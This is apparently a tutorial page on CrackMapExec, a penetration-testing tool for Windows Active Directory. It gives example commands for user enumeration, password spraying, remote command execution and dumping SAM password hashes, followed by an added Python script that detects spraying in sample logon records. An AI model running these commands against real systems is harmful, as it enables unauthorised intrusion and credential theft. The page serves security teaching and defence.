CrackMapExec (CME) is an open-source tool used for network enumeration and penetration testing, particularly on Windows networks. It automates the process of gathering information, executing advanced password attacks, and performing post-exploitation activities like lateral movement. CME is often referred to as the “Swiss Army knife” for targeting Windows Active Directory environments. 🛠️
## Key Features of CrackMapExec
- Active Directory Enumeration: Enumerate domains, forests, users, groups, computers, and trust relationships. 📋
- Credential Brute Forcing: Attack various network services (e.g., SMB, RPC, LDAP, and WinRM) with password spraying, credential stuffing, and brute force attacks. 🔑
- Remote Code Execution: Execute commands and scripts remotely on target systems using PowerShell, WMI, SMB, and PSExec. 💻
- Lateral Movement: Perform lateral movement and jump between compromised machines using techniques like pass-the-hash, pass-the-ticket, and token impersonation. 🔗
- Integration Support: Integrate with other penetration testing tools, such as Metasploit, PowerShell Empire, and BloodHound. 🔄
## Example Code Snippets

Here are some example commands you can use with CrackMapExec:
### Example 1: Enumerating Domain Users

```bash
# Enumerate all users in the domain
crackmapexec smb 192.168.1.0/24 -u 'username' -p 'password' --users
```

### Example 2: Password Spraying

```bash
# Perform password spraying attack
crackmapexec smb 192.168.1.0/24 -u 'admin' -p 'password123'
```

### Example 3: Remote Code Execution

```bash
# Execute a command on a remote system
crackmapexec smb 192.168.1.10 -u 'Administrator' -p 'P@ssw0rd' -x 'whoami'
```

### Example 4: Dumping SAM Hashes

```bash
# Dump local SAM hashes from a target system
crackmapexec smb 192.168.1.10 -u 'Administrator' -p 'P@ssw0rd' --sam
```
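The password spraying described under Key Features and in Example 2 leaves a recognisable trace on the defender's side: one source address failing to authenticate against many distinct accounts in a short window. The following is an added example, not code from the original page or from the CrackMapExec project, of how a detection script can pick that pattern out of failed-logon records. The log lines are constructed for the example and use a simplified four-field layout (timestamp, source address, target account, outcome) standing in for the corresponding fields of a Windows Security failed-logon event; the function names and thresholds are the example's own choices.

```python
"""Flag password-spraying patterns in failed-logon records.

Added example, not part of the original page or of CrackMapExec.
A source that fails against many *distinct* accounts within a short window
is the signature of spraying; a single account failing repeatedly (a user
mistyping a password) is not.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample records: "<ISO timestamp> <source_ip> <account> <outcome>"
SAMPLE_LOGONS = [
    # 10.0.0.5 tries one password against six accounts in six seconds
    "2024-05-01T10:00:01 10.0.0.5 alice FAIL",
    "2024-05-01T10:00:02 10.0.0.5 bob FAIL",
    "2024-05-01T10:00:03 10.0.0.5 carol FAIL",
    "2024-05-01T10:00:04 10.0.0.5 dave FAIL",
    "2024-05-01T10:00:05 10.0.0.5 erin FAIL",
    "2024-05-01T10:00:06 10.0.0.5 frank FAIL",
    "2024-05-01T10:00:07 10.0.0.5 frank SUCCESS",
    # 10.0.0.9 is a user repeatedly mistyping their own password
    "2024-05-01T10:01:00 10.0.0.9 alice FAIL",
    "2024-05-01T10:01:30 10.0.0.9 alice FAIL",
    "2024-05-01T10:02:00 10.0.0.9 alice FAIL",
    "2024-05-01T10:02:30 10.0.0.9 alice FAIL",
    # 10.0.0.7 fails against two accounts, 25 minutes apart
    "2024-05-01T10:05:00 10.0.0.7 bob FAIL",
    "2024-05-01T10:30:00 10.0.0.7 carol FAIL",
]


def parse_line(line):
    """Split one constructed record into (timestamp, source, account, outcome)."""
    ts, src, account, outcome = line.split()
    return datetime.fromisoformat(ts), src, account.lower(), outcome.upper()


def detect_spraying(lines, window=timedelta(minutes=5), min_accounts=5):
    """Return {source_ip: [accounts]} for every source that failed against at
    least `min_accounts` distinct accounts inside some `window`-long span.

    Only FAIL outcomes count; successes are ignored for the threshold so that
    a legitimate user who eventually logs in is not penalised.
    """
    events = sorted(parse_line(line) for line in lines)
    failures_by_src = defaultdict(list)
    for ts, src, account, outcome in events:
        if outcome == "FAIL":
            failures_by_src[src].append((ts, account))

    alerts = {}
    for src, fails in failures_by_src.items():
        start = 0
        peak = 0  # largest number of distinct accounts seen in any window
        for end in range(len(fails)):
            # slide the window start forward until it fits inside `window`
            while fails[end][0] - fails[start][0] > window:
                start += 1
            distinct = {account for _, account in fails[start:end + 1]}
            peak = max(peak, len(distinct))
        if peak >= min_accounts:
            # report every account that source failed against, not just the window
            alerts[src] = sorted({account for _, account in fails})
    return alerts


if __name__ == "__main__":
    for src, accounts in detect_spraying(SAMPLE_LOGONS).items():
        print(f"possible password spraying from {src}: {', '.join(accounts)}")
```

With the defaults (five distinct accounts within five minutes) only `10.0.0.5` is reported; `10.0.0.9` is a single account failing repeatedly, and `10.0.0.7` touches two accounts too far apart to fall into one window. Widening the window or lowering the threshold is a tuning decision: the two knobs trade missed slow-and-low sprays against noise from help-desk or service-account mistakes.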
## Learning Resources 📚
For more detailed guides and resources, you can visit the CrackMapExec Cheat Sheet or the PopLabSec tutorial.